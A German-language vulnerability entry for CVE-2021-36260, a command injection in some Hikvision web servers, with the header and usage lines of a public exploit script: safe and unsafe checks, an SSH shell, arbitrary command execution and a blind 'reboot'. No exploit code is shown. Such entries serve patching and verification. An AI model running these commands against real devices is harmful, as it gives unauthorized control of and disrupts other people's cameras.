
Befehlseinschleusungsschwachstelle im Webserver einiger Hikvision-Produkte. Aufgrund der unzureichenden Eingabevalidierung kann ein Angreifer die Schwachstelle ausnutzen, um einen Befehlseinschleusungsangriff durchzuführen, indem er einige Nachrichten mit bösartigen Befehlen sendet.
CVE-2021-36260 POC Command Injection-Schwachstelle im Webserver einiger Hikvision-Produkte. Aufgrund unzureichender Eingabevalidierung kann ein Angreifer die Schwachstelle ausnutzen, um einen Command Injection-Angriff durchzuführen, indem er Nachrichten mit schädlichen Befehlen sendet.
Exploit Titel: Hikvision Web Server Build 210702 - Command Injection
Exploit Autor: bashis
Vendor Homepage: https://www.hikvision.com/
Version: 1.0
CVE: CVE-2021-36260
Referenz: https://watchfulip.github.io/2021/09/18/Hikvision-IP-Camera-Unauthenticated-RCE.html
Hinweis:
[Beispiele] Sichere Schwachstellen-/Verifikationsprüfung: $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --check
Sichere und unsichere Schwachstellen-/Verifikationsprüfung: (wird 'unsafe check' nur verwenden, wenn nicht mit 'safe check' verifiziert) $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --check --reboot
Unsichere Schwachstellen-/Verifikationsprüfung: $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --reboot
SSH-Shell starten und verbinden: $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --shell
Befehl ausführen: $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --cmd "ls -l"
Blinden Befehl ausführen: $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --cmd_blind "reboot"